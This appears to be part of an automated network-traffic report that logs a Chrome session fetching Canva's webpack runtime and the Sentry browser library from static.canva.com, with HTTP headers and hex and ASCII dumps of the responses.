                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: z02zb7sCfpjcbW2MHq8vWO3tXhga6p671Z/uw/61BwAQrtpj0CgBosqPxifcpl+FzERmkdIQxmA=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: SHFYJ3YZZAFK88CJ
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: qJFUYJWZkSgUaDPHVgunJZUPtAStozxQ
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 68 68 78 52 76 4a 32 78 25 32 42 55 6c 72 59 35 4e 51 35 77 50 49 4c 51 6a 4e 37 31 25 32 42 62 63 61 74 6f 30 63 79 78 36 51 56 4a 74 78 67 61 63 47 73 6c 58 54 6e 35 64 37 39 6f 73 66 6e 36 68 62 39 74 6a 75 58 6d 43 48 4b 71 38 55 79 63 5a 53 79 6a 35 55 25 32 46 33 5a 43 7a 54 31 71 49 67 57 6b 32 44 43 4f 76 73 70 44 65 63 78 55 79 48 44 78 6b 5a 71 36 63 4c 30 30 61 38 67 35 43 46 6e 30 48 57 31 77 51 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hhxRvJ2x%2BUlrY5NQ5wPILQjN71%2Bbcato0cyx6QVJtxgacGslXTn5d79osfn6hb9tjuXmCHKq8UycZSyj5U%2F3ZCzT1qIgWk2DCOvspDecxUyHDxkZq6cL00a8g5CFn0HW1wQ%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1199INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 74 2c 6e 2c 73 2c 66 3d 7b 7d 2c 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 76 61 72 20 72 3d 69 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 74 3d 69 5b 65 5d 3d 7b 69 64 3a 65 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 66 5b 65 5d 2e 63 61 6c 6c 28 74 2e 65 78 70 6f 72 74 73 2c 74 2c 74 2e 65 78 70 6f 72 74 73 2c 63 29 2c 74 2e 6c 6f 61 64 65 64 3d 21 30 2c 74 2e 65 78 70 6f 72 74 73 7d 63 2e 6d 3d 66 2c 63 2e 61 6d 64 44 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 65 66 69 6e 65 20 63 61 6e 6e 6f
                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var e,r,t,n,s,f={},i={};function c(e){var r=i[e];if(void 0!==r)return r.exports;var t=i[e]={id:e,loaded:!1,exports:{}};return f[e].call(t.exports,t,t.exports,c),t.loaded=!0,t.exports}c.m=f,c.amdD=function(){throw new Error("define canno
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 72 5b 74 5d 7d 29 7d 2c 63 2e 66 3d 7b 7d 2c 63 2e 65 3d 65 3d 3e 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 63 2e 66 29 2e 72 65 64 75 63 65 28 28 28 72 2c 74 29 3d 3e 28 63 2e 66 5b 74 5d 28 65 2c 72 29 2c 72 29 29 2c 5b 5d 29 29 2c 63 2e 75 3d 65 3d 3e 7b 69 66 28 31 33 30 32 3d 3d 3d 65 29 72 65 74 75 72 6e 22 66 39 31 39 64 38 32 33 65 36 38 36 39 31 63 33 2e 6a 73 22 3b 69 66 28 38 39 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 65 64 33 37 38 31 63 35 63 31 63 63 30 63 37 35 2e 6a 73 22 3b 69 66 28 35 37 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 61 36 39 65 36 64 63 36 31 32 31 34 36 63 37 34 2e 6a 73 22 3b 69
                                                                                                                                                                                                                                                    Data Ascii: defineProperty(e,t,{enumerable:!0,get:r[t]})},c.f={},c.e=e=>Promise.all(Object.keys(c.f).reduce(((r,t)=>(c.f[t](e,r),r)),[])),c.u=e=>{if(1302===e)return"f919d823e68691c3.js";if(8919===e)return"ed3781c5c1cc0c75.js";if(5769===e)return"a69e6dc612146c74.js";i
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 22 65 64 39 38 30 34 35 34 64 66 65 63 37 36 32 36 2e 6a 73 22 3b 69 66 28 36 33 31 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 66 61 31 35 32 33 62 39 39 34 31 39 61 30 33 36 2e 6a 73 22 3b 69 66 28 33 36 37 30 3d 3d 3d 65 29 72 65 74 75 72 6e 22 39 30 32 65 36 31 35 32 62 35 64 62 38 39 39 32 2e 6a 73 22 3b 69 66 28 39 35 33 3d 3d 3d 65 29 72 65 74 75 72 6e 22 64 32 32 32 64 35 64 64 39 38 62 38 36 65 37 31 2e 6a 73 22 3b 69 66 28 37 38 33 38 3d 3d 3d 65 29 72 65 74 75 72 6e 22 33 31 31 63 33 66 32 34 64 35 31 65 37 38 63 64 2e 6a 73 22 3b 69 66 28 37 36 33 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 30 65 65 61 63 62 39 34 61 64 32 31 34 32 62 61 2e 6a 73 22 3b 69 66 28 36 36 36 38 3d 3d 3d 65 29 72 65 74 75 72 6e 22 37 31 65 65 30 37 30 32 34 39 37 63 30 36 66
                                                                                                                                                                                                                                                    Data Ascii: "ed980454dfec7626.js";if(6310===e)return"fa1523b99419a036.js";if(3670===e)return"902e6152b5db8992.js";if(953===e)return"d222d5dd98b86e71.js";if(7838===e)return"311c3f24d51e78cd.js";if(7631===e)return"0eeacb94ad2142ba.js";if(6668===e)return"71ee0702497c06f
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 34 37 3a 31 2c 33 38 38 32 3a 31 2c 31 30 34 32 3a 31 7d 5b 65 5d 29 72 65 74 75 72 6e 22 65 66 34 36 64 62 33 37 35 31 64 38 65 39 39 39 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 38 39 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 34 32 65 64 61 63 64 61 35 33 66 36 38 66 65 65 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 38 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 31 66 62 37 34 62 32 39 35 66 63 39 36 65 64 33 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 7b 38 30 36 38 3a 31 2c 34 30 34 33 3a 31 2c 31 37 36 31 3a 31 2c 37 37 38 33 3a 31 2c 33 38 38 34 3a 31 2c 35 31 33 36 3a 31 7d 5b 65 5d 29 72 65 74 75 72 6e 22 65 66 34 36 64 62 33 37 35 31 64 38 65 39 39 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 22 3b 69 66 28 31 34 31 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 36
                                                                                                                                                                                                                                                    Data Ascii: 47:1,3882:1,1042:1}[e])return"ef46db3751d8e999.ltr.css";if(8919===e)return"42edacda53f68fee.ltr.css";if(869===e)return"1fb74b295fc96ed3.ltr.css";if({8068:1,4043:1,1761:1,7783:1,3884:1,5136:1}[e])return"ef46db3751d8e999.vendor.ltr.css";if(1411===e)return"6
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 34 37 3a 31 2c 33 38 38 32 3a 31 2c 31 30 34 32 3a 31 7d 5b 65 5d 29 72 65 74 75 72 6e 22 63 31 36 36 65 35 64 32 30 61 64 35 38 66 34 65 2e 72 74 6c 2e 63 73 73 22 3b 69 66 28 38 39 31 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 64 65 37 35 32 36 62 36 36 63 35 39 39 62 35 36 2e 72 74 6c 2e 63 73 73 22 3b 69 66 28 38 36 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 33 32 32 36 33 38 30 39 65 36 65 36 63 37 64 63 2e 72 74 6c 2e 63 73 73 22 3b 69 66 28 31 34 31 31 3d 3d 3d 65 29 72 65 74 75 72 6e 22 65 37 61 36 66 61 38 37 32 33 35 33 30 37 31 61 2e 72 74 6c 2e 63 73 73 22 3b 69 66 28 31 36 38 39 3d 3d 3d 65 29 72 65 74 75 72 6e 22 62 34 62 64 32 36 38 62 37 65 35 61 66 61 61 34 2e 72 74 6c 2e 63 73 73 22 3b 69 66 28 34 38 37 37 3d 3d 3d 65 29 72 65 74 75 72 6e 22 34
                                                                                                                                                                                                                                                    Data Ascii: 47:1,3882:1,1042:1}[e])return"c166e5d20ad58f4e.rtl.css";if(8919===e)return"de7526b66c599b56.rtl.css";if(869===e)return"32263809e6e6c7dc.rtl.css";if(1411===e)return"e7a6fa872353071a.rtl.css";if(1689===e)return"b4bd268b7e5afaa4.rtl.css";if(4877===e)return"4
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 2b 29 7b 76 61 72 20 75 3d 61 5b 6c 5d 3b 69 66 28 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 3d 3d 65 7c 7c 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 65 62 70 61 63 6b 22 29 3d 3d 73 2b 74 29 7b 69 3d 75 3b 62 72 65 61 6b 7d 7d 69 66 28 21 69 29 7b 69 66 28 6f 3d 21 30 2c 28 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 29 2e 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2c 69 2e 74 69 6d 65 6f 75 74 3d 31 32 30 2c 63 2e 6e 63 29 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 63 2e 6e 63 29 3b 69 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 65 62 70 61 63 6b 22 2c 73 2b 74 29 2c 69 2e 73 72 63 3d 65 7d 6e 5b 65 5d 3d
                                                                                                                                                                                                                                                    Data Ascii: +){var u=a[l];if(u.getAttribute("src")==e||u.getAttribute("data-webpack")==s+t){i=u;break}}if(!i){if(o=!0,(i=document.createElement("script")).charset="utf-8",i.timeout=120,c.nc)i.setAttribute("nonce",c.nc);i.setAttribute("data-webpack",s+t),i.src=e}n[e]=
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 73 2c 69 29 7b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 64 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 69 66 28 64 5b 74 5d 2e 65 6e 64 73 57 69 74 68 28 65 29 29 72 65 74 75 72 6e 20 64 2e 73 70 6c 69 63 65 28 74 2c 31 29 2c 61 28 65 2c 72 2c 73 2c 69 29 3b 69 66 28 74 29 7b 69 66 28 30 3d 3d 3d 6c 2e 6c 65 6e 67 74 68 29 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 2e 74 68 65 6e 28 28 28 29 3d 3e 7b 45 28 6c 2c 67 29 2c 6c 3d 5b 5d 2c 70 3d 30 7d 29 29 3b 63 6f 6e 73 74 20 72 3d 79 28 65 29 3b 69 66 28 6c 2e 6c 65 6e 67 74 68 3e 3d 31 26 26 70 2b 72 3e 66 7c 7c 6c 2e 6c 65 6e 67 74 68 3e 3d 6e 29 45 28 6c 2c 67 29 2c 6c 3d 5b 5d 2c 70 3d 30 3b 70 2b 3d 72 7d 65 6c 73 65 7b 69 66 28 68 2b 2b 3c 31 30 29 72 65 74 75 72 6e 20 61 28 65 2c 72 2c 73 2c 69 29
                                                                                                                                                                                                                                                    Data Ascii: s,i){for(let t=0;t<d.length;t++)if(d[t].endsWith(e))return d.splice(t,1),a(e,r,s,i);if(t){if(0===l.length)Promise.resolve().then((()=>{E(l,g),l=[],p=0}));const r=y(e);if(l.length>=1&&p+r>f||l.length>=n)E(l,g),l=[],p=0;p+=r}else{if(h++<10)return a(e,r,s,i)
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 6e 2e 68 72 65 66 29 3b 69 66 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 74 61 72 74 73 57 69 74 68 28 22 68 74 74 70 22 29 29 7b 63 6f 6e 73 74 7b 70 72 6f 74 6f 63 6f 6c 3a 72 2c 68 6f 73 74 3a 74 7d 3d 6e 65 77 20 55 52 4c 28 65 29 3b 72 65 74 75 72 6e 60 24 7b 72 7d 2f 2f 63 68 75 6e 6b 2d 63 6f 6d 70 6f 73 69 6e 67 2e 24 7b 74 2e 73 70 6c 69 74 28 22 2e 22 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 22 2e 22 29 7d 60 7d 65 6c 73 65 20 69 66 28 5b 22 6c 6f 63 61 6c 68 6f 73 74 22 2c 22 31 32 37 2e 30 2e 30 2e 31 22 5d 2e 69 6e 63 6c 75 64 65 73 28 72 2e 68 6f 73 74 6e 61 6d 65 29 26 26 72 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 67 65 74 28 22 70 61 67 65 4c 6f 61 64 57 6f 72 6b 65 72 55 72 6c 22 29 29 72 65 74 75 72 6e 20 72 2e
                                                                                                                                                                                                                                                    Data Ascii: n.href);if(null==e?void 0:e.startsWith("http")){const{protocol:r,host:t}=new URL(e);return`${r}//chunk-composing.${t.split(".").slice(-2).join(".")}`}else if(["localhost","127.0.0.1"].includes(r.hostname)&&r.searchParams.get("pageLoadWorkerUrl"))return r.
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 31 39 6a 62 73 39 2e 65 30 34 30 36 36 31 32 37 38 34 66 31 66 39 37 2e 72 74 6c 2e 63 73 73 22 3a 33 38 34 38 35 31 2c 22 34 62 32 39 36 30 36 66 61 31 34 32 65 66 63 61 2e 72 75 6e 74 69 6d 65 2e 6a 73 22 3a 35 39 33 33 36 2c 22 61 30 36 38 34 62 30 37 38 30 63 37 33 39 65 39 2e 76 65 6e 64 6f 72 2e 6c 74 72 2e 63 73 73 22 3a 31 35 33 36 31 2c 22 61 35 33 39 66 32 32 63 62 34 62 34 63 63 39 65 2e 76 65 6e 64 6f 72 2e 6a 73 22 3a 31 39 31 30 38 38 36 2c 22 38 65 35 34 32 36 32 32 31 32 61 65 64 35 37 66 2e 76 65 6e 64 6f 72 2e 72 74 6c 2e 63 73 73 22 3a 31 35 33 36 31 2c 22 37 36 64 38 62 30 36 36 31 32 62 39 34 35 38 35 2e 76 65 6e 64 6f 72 2e 6a 73 22 3a 36 39 38 33 36 30 2c 22 34 32 65 64 61 63 64 61 35 33 66 36 38 66 65 65 2e 6c 74 72 2e 63 73 73 22
                                                                                                                                                                                                                                                    Data Ascii: 19jbs9.e0406612784f1f97.rtl.css":384851,"4b29606fa142efca.runtime.js":59336,"a0684b0780c739e9.vendor.ltr.css":15361,"a539f22cb4b4cc9e.vendor.js":1910886,"8e54262212aed57f.vendor.rtl.css":15361,"76d8b06612b94585.vendor.js":698360,"42edacda53f68fee.ltr.css"


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    12192.168.2.449754104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC623OUTGET /static/lib/sentry/7.16.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1353INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:23 GMT
                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79f59ad30f74-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Age: 1870439
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: W/"91258797204803263e4c46f8400f1bda"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:09 GMT
                                                                                                                                                                                                                                                    Last-Modified: Mon, 14 Oct 2024 22:43:15 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-id-2: n/tgAv7nhdMK8+ZDRGJEaCxpKxVhLFJZMQK/5RvJNADTgttBr37iBiAAR/bcmMUlTegrHaZW7D4=
                                                                                                                                                                                                                                                    x-amz-meta-vary: Origin
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: 4BC7Q2FFFT5VZFJY
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: tozEOUZEBcqjRpGz85aK0Lg42bZme1w8
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8XsPfEY%2Bkp39YVKBKMkdKhRCkl2OvGIRGK6oJfDm28k1C6gZ1ATLHR7KaUFJgqM4SA5%2F7dYYbh7Mi4LQEqfkxUlIhpmrZYIyGCPqWw6Oh0%2BaVoIXhGD5JzSwprGhR%2B8XjBo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1293INData Raw: 37 39 66 65 0d 0a 2f 2a 21 20 40 73 65 6e 74 72 79 2f 62 72 6f 77 73 65 72 20 37 2e 31 36 2e 30 20 28 35 33 38 36 63 65 37 29 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 67 65 74 73 65 6e 74 72 79 2f 73 65 6e 74 72 79 2d 6a 61 76 61 73 63 72 69 70 74 20 2a 2f 0a 76 61 72 20 53 65 6e 74 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 73 77 69 74 63 68 28 6e 2e 63 61 6c 6c 28 74 29 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 72 72 6f 72 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 45 78 63 65 70 74 69 6f 6e 5d 22 3a 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 44 4f 4d 45 78 63 65 70 74 69 6f 6e
                                                                                                                                                                                                                                                    Data Ascii: 79fe/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 65 28 29 2e 6a 6f 69 6e 28 75 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 22 3c 75 6e 6b 6e 6f 77 6e 3e 22 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 6e 29 7b 63 6f 6e 73 74 20 65 3d 74 2c 72 3d 5b 5d 3b 6c 65 74 20 69 2c 73 2c 63 2c 75 2c 61 3b 69 66 28 21 65 7c 7c 21 65 2e 74 61 67 4e 61 6d 65 29 72 65 74 75 72 6e 22 22 3b 72 2e 70 75 73 68 28 65 2e 74 61 67 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3b 63 6f 6e 73 74 20 66 3d 6e 26 26 6e 2e 6c 65 6e 67 74 68 3f 6e 2e 66 69 6c 74 65 72 28 28 74 3d 3e 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 29 29 2e 6d 61 70 28 28 74 3d 3e 5b 74 2c 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 74 29 5d 29 29 3a 6e 75 6c 6c 3b 69 66 28 66 26 26 66 2e 6c 65 6e 67 74 68 29 66 2e 66 6f 72 45
                                                                                                                                                                                                                                                    Data Ascii: e().join(u)}catch(t){return"<unknown>"}}function v(t,n){const e=t,r=[];let i,s,c,u,a;if(!e||!e.tagName)return"";r.push(e.tagName.toLowerCase());const f=n&&n.length?n.filter((t=>e.getAttribute(t))).map((t=>[t,e.getAttribute(t)])):null;if(f&&f.length)f.forE
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 61 2e 6d 61 74 63 68 28 2f 5e 5c 64 2b 2f 29 3b 74 26 26 28 61 3d 74 5b 30 5d 29 7d 72 65 74 75 72 6e 20 77 28 7b 68 6f 73 74 3a 73 2c 70 61 73 73 3a 69 2c 70 61 74 68 3a 75 2c 70 72 6f 6a 65 63 74 49 64 3a 61 2c 70 6f 72 74 3a 6f 2c 70 72 6f 74 6f 63 6f 6c 3a 65 2c 70 75 62 6c 69 63 4b 65 79 3a 72 7d 29 7d 28 74 29 3a 77 28 74 29 7d 63 6f 6e 73 74 20 53 3d 5b 22 64 65 62 75 67 22 2c 22 69 6e 66 6f 22 2c 22 77 61 72 6e 22 2c 22 65 72 72 6f 72 22 2c 22 6c 6f 67 22 2c 22 61 73 73 65 72 74 22 2c 22 74 72 61 63 65 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 24 28 74 2c 6e 3d 30 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 30 3d 3d 3d 6e 7c 7c 74 2e 6c 65 6e 67 74 68 3c 3d 6e 3f 74 3a 60 24 7b 74 2e 73 75 62 73 74 72 28 30 2c 6e
                                                                                                                                                                                                                                                    Data Ascii: a.match(/^\d+/);t&&(a=t[0])}return w({host:s,pass:i,path:u,projectId:a,port:o,protocol:e,publicKey:r})}(t):w(t)}const S=["debug","info","warn","error","log","assert","trace"];function $(t,n=0){return"string"!=typeof t||0===n||t.length<=n?t:`${t.substr(0,n
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 26 26 28 6e 5b 65 5d 3d 74 5b 65 5d 29 3b 72 65 74 75 72 6e 20 6e 7d 72 65 74 75 72 6e 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 6e 3d 34 30 29 7b 63 6f 6e 73 74 20 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 52 28 74 29 29 3b 69 66 28 65 2e 73 6f 72 74 28 29 2c 21 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 22 5b 6f 62 6a 65 63 74 20 68 61 73 20 6e 6f 20 6b 65 79 73 5d 22 3b 69 66 28 65 5b 30 5d 2e 6c 65 6e 67 74 68 3e 3d 6e 29 72 65 74 75 72 6e 20 24 28 65 5b 30 5d 2c 6e 29 3b 66 6f 72 28 6c 65 74 20 74 3d 65 2e 6c 65 6e 67 74 68 3b 74 3e 30 3b 74 2d 2d 29 7b 63 6f 6e 73 74 20 72 3d 65 2e 73 6c 69 63 65 28 30 2c 74 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 3b 69 66 28 21 28 72 2e 6c
                                                                                                                                                                                                                                                    Data Ascii: hasOwnProperty.call(t,e)&&(n[e]=t[e]);return n}return{}}function C(t,n=40){const e=Object.keys(R(t));if(e.sort(),!e.length)return"[object has no keys]";if(e[0].length>=n)return $(e[0],n);for(let t=e.length;t>0;t--){const r=e.slice(0,t).join(", ");if(!(r.l
                                                                                                                                                                                                                                                    2024-12-19 21:27:23 UTC1369INData Raw: 74 2e 6e 61 6d 65 7c 7c 55 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 55 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 28 29 7b 69 66 28 21 28 22 66 65 74 63 68 22 69 6e 20 79 29 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 48 65 61 64 65 72 73 2c 6e 65 77 20 52 65 71 75 65 73 74 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 29 2c 6e 65 77 20 52 65 73 70 6f 6e 73 65 2c 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 74 29 7b 72 65 74 75 72 6e 20 74 26 26 2f 5e 66 75 6e 63 74 69 6f 6e 20 66 65 74 63 68 5c 28 5c 29 5c 73 2b 5c 7b 5c 73 2b 5c 5b 6e 61 74 69 76 65 20 63 6f 64 65 5c 5d 5c 73 2b 5c 7d 24 2f 2e 74 65 73 74 28 74 2e 74 6f 53 74 72 69 6e 67
                                                                                                                                                                                                                                                    Data Ascii: t.name||U}catch(t){return U}}function P(){if(!("fetch"in y))return!1;try{return new Headers,new Request("http://www.example.com"),new Response,!0}catch(t){return!1}}function H(t){return t&&/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString
